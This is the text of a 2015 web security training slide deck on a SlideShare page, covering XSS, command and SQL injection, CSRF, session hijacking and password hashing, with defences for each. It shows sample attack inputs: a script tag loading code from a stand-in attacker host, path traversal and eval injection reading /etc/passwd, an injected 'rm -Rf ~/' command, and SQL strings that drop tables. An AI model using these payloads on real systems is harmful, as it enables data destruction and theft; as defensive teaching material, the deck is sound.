Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Security 101

590 views

Published on

Even the best software engineers can open themselves up to threats with lazy coding. These slides cover the basics of web security, the most common attacks, and simple measures you can employ in order to prevent them.

This presentation covers coding best practices and the following types of attacks:

• XSS - Cross-Site Scripting

• XSRF - Cross-Site Request Forgery

• Session Hijacking

• SQL Injection

Published in: Software
  • Be the first to comment

Web Security 101

  1. 1. © 2015 Adobe Systems Incorporated. All Rights Reserved. Web Security 101 Brent Shaffer | Matrix Architect
  2. 2. © 2015 Adobe Systems Incorporated. All Rights Reserved. 2 Why are we talking about this? ▪ Your framework / programming language does not do everything for you ▪ Your website is vulnerable ▪ Security through obscurity is not sufficient ▪ Your friends may want to embarrass you ▪ "hactivists" might make you look like a fool ▪ bots are always busy ▪ Many attacks are easy to prevent ▪ The first step is becoming aware of the types of attacks that exist
  3. 3. © 2015 Adobe Systems Incorporated. All Rights Reserved. 3 Kinds of Attacks 2 | Code Injection 3 | Cross Site Request Forgery (CSRF) 4 | Session Hijacking 5 | So many, many more... 1 | Cross Site Scripting (XSS)
  4. 4. © 2015 Adobe Systems Incorporated. All Rights Reserved. 4 Rules of Thumb ▪ All Inputs are Evil! ▪ Do not trust your users ▪ Do not trust your users' cookies, parameters, or HTTP Headers ▪ "All servers are evil" is also a good assumption for end-users ▪ Whitelists are better than blacklists ▪ Never store passwords in plaintext ▪ Never store your passwords in source code ▪ Don't leak error messages
  5. 5. © 2015 Adobe Systems Incorporated. All Rights Reserved. 5 Cross Site Scripting (XSS) ▪ The term XSS describes a specific kind of injection attack ▪ XSS injects Javascript (or other scripts) that run on the victim's client (browser) ▪ This malicious code usually steals cookies of the person who views the infected web page. ▪ Exploits a user's trust of a site. Can be combined with phishing or CSRF to steal all kinds of things. ▪ Accounted for 84% of all website security vulnerabilities (Symantec, 2007) <script src="http://attacker-site.com/malicious-code.js"> </script>
  6. 6. © 2015 Adobe Systems Incorporated. All Rights Reserved. ▪ Validate user input when storing ▪ Escape when using variables in output ▪ based off the content type it's being used in ▪ Escaping HTML for a variable in JavaScript will not save you ▪ Use Templating Languages ▪ HAML, Twig (PHP), Jinja (Python), Pebble (Java) ▪ If this isn't possible, use Output Escaping ▪ Use a Markup Language if you want user-input rich text ▪ markdown, textile, rst 6 Cross Site Scripting (XSS)
  7. 7. © 2015 Adobe Systems Incorporated. All Rights Reserved. 7 Code Injection ▪ Comes in many forms ▪ Command-Line injection ▪ SQL-injection ▪ HTML ▪ JavaScript (XSS)
  8. 8. © 2015 Adobe Systems Incorporated. All Rights Reserved. 8 Code Injection - Command-Line injection ▪ File paths based on user input is NOT OKAY $user_id = $_GET['user_id']; $file = "/some/path/config/$user_id.json"; require $file; ▪ Attackers can access filesystem using "upwards" paths ?user_id=../../../etc/passwd #
  9. 9. © 2015 Adobe Systems Incorporated. All Rights Reserved. 9 $user_id = $_GET['user_id']; $pic = "/some/path/pictures/$user_id.jpg"; if (`ls $pic`) { ... } Code Injection - Command-Line injection ▪ Avoid user input when executing on the command line ▪ Commands like exec, passthru, and system are often used to execute bash commands ?user_id=./ && rm -Rf ~/
  10. 10. © 2015 Adobe Systems Incorporated. All Rights Reserved. 10 $user_id = $_GET['user_id']; $file = "/some/path/config/$user_id.json"; eval ("file_get_contents('$pic');"); Code Injection - Command-Line injection ▪ Avoid using dynamic code execution ▪ Commands like eval are used to dynamically evaluate PHP code ?user_id=foo');file_get_contents('etc/passwd
  11. 11. © 2015 Adobe Systems Incorporated. All Rights Reserved. 11 ▪ strip “upwards” paths ▪ ensure all files are relative to a safe “root” ▪ be very strict on validation ▪ output-escaping depending on the context ▪ escapeshellcmd for exec ▪ addslashes for eval ▪ use with extreme caution Code Injection - Command-Line injection
  12. 12. © 2015 Adobe Systems Incorporated. All Rights Reserved. 12 Code Injection - SQL injection © xkcd.com
  13. 13. © 2015 Adobe Systems Incorporated. All Rights Reserved. 13 ▪ Similar to code injection, but happens when user input is used as part of a SQL query $search = $_GET['search']; $sql = "SELECT * FROM students WHERE name = '$search'"; ▪ Can be used to delete, corrupt, or steal data. ?search=';DROP ALL TABLES ?search=';UPDATE students SET name=jerkface ?search=foo' OR public=0 Code Injection - SQL injection
  14. 14. © 2015 Adobe Systems Incorporated. All Rights Reserved. 14 ▪ SANITIZE YOUR INPUTS ▪ use "bound variables" $search = $_GET['search']; $sql = "SELECT * FROM students WHERE name = ?"; $statement = $pdo->prepare($sql, $search); $statement->execute(); ▪ Use ORMs / Database Abstraction Layers when possible Code Injection - SQL injection
  15. 15. © 2015 Adobe Systems Incorporated. All Rights Reserved. 15 Cross-Site Request Forgery (CSRF) ▪ Exploits the browsers running on the client ▪ Exploits a site's trust in its users ▪ Victim is logged into Vulnerable Website ▪ Attacker has Victim make a request to Vulnerable Website without them knowing ▪ Victim submits a form on Fake Website, but it actually posts to Vulnerable Website ▪ Victim clicks a link it believes is for Fake Website, but it actually goes to Vulnerable Website ▪ An action is executed on behalf of Victim that they did not intend https://facebook.com/authorize?client_id=HackerGuy&authorized=true ▪ The Infamous "Samy Worm"
  16. 16. © 2015 Adobe Systems Incorporated. All Rights Reserved. 16 ▪ Validate the Referrer ▪ The HTTP Referrer header says which URL initiated the request ▪ You can use this to block from any referrer that isn't you ▪ Only works if a whitelist can be constructed for where the requests will come from ▪ Use a CSRF-Token ▪ This is a token generated for each request based on the client's session ID ▪ Each form submits this back to the website ▪ Very difficult for an attacker to spoof <input type="hidden" name="csrf" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt"> Cross-Site Request Forgery (CSRF)
  17. 17. © 2015 Adobe Systems Incorporated. All Rights Reserved. 17 Session Hijacking ▪ Similar to CSRF ▪ The attacker obtains the victim's cookie, and is then able to perform actions on their behalf ▪ Typically done for websites not secured with SSL/HTTPS ▪ Open networks and insecure networks (WEP) commonly found in public areas make it possible to view other traffic on the same router ▪ Plugins make this incredibly easy ▪ FireSheep / Cookie Cadger / DroidSheep ▪ Sniffing is easy with tools like WireShark
  18. 18. © 2015 Adobe Systems Incorporated. All Rights Reserved. 18 Session Hijacking ▪ Use SSL/HTTPS you dummy! ▪ It is not enough to only secure the page the user logs into ▪ Don't allow HTTP on any site with user logins ▪ As the end user, usually whining and complaining can go a long way ▪ A few months after FireSheep, Facebook and Twitter implemented HTTPS throughout the site
  19. 19. © 2015 Adobe Systems Incorporated. All Rights Reserved. Proper Password Management 19 ▪ NEVER STORE PASSWORDS IN PLAINTEXT ▪ always use a hash (one-way) ▪ just hashing is not enough ▪ Lookup Tables / Rainbow Tables ▪ all passwords < 7 characters require 64GB space to crack ▪ always use a salt ▪ a random unique string for each password
  20. 20. © 2015 Adobe Systems Incorporated. All Rights Reserved. 20 Proper Password Management ▪ Brute Forcing ▪ a lot faster than you think ▪ 2012 Macbook Pro for salted MD5s: ▪ 6 char passwords: 5 hours ▪ 7 char passwords: 22 days ▪ entire english language: 1.8 seconds ▪ How to combat ▪ Use slow algorithms ▪ Iterate over hashing functions a lot of times ▪ require 8-character passwords, numbers/symbols, etc.
  21. 21. © 2015 Adobe Systems Incorporated. All Rights Reserved. 21 Resources ▪ Top 10 Common Attacks: https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet ▪ Automatic SQL Injection & Database Takeover Tool: http://sqlmap.org ▪ Amazon Mistake: http://www.devfactor.net/2014/12/30/2375-amazon-mistake/ ▪ Burger King Hack: http://mashable.com/2013/02/18/burger-king-twitter-account-hacked/ ▪ Twitter Hack: http://countermeasures.trendmicro.eu/twitter-not-hacked-by-iranian-cyber-army/ ▪ Samy's Confession: http://namb.la/popular/tech.html ▪ Bobby Tables: http://bobby-tables.com ▪ Notorious Hacks: http://www.arnnet.com.au/slideshow/341113/top-10-most-notorious-cyber-attacks-history ▪ Passwords: http://www.slideshare.net/ircmaxell/password-storage-and-attacking-in-php-php-argentina ▪ More Good Slides: http://www.slideshare.net/mpeters/web-security-101
  22. 22. © 2015 Adobe Systems Incorporated. All Rights Reserved. 22 Brent Shaffer bshafs@gmail.com Twitter: @bshaffer Github: @bshaffer Questions?
  23. 23. © 2015 Adobe Systems Incorporated. All Rights Reserved. Adobe Confidential.

×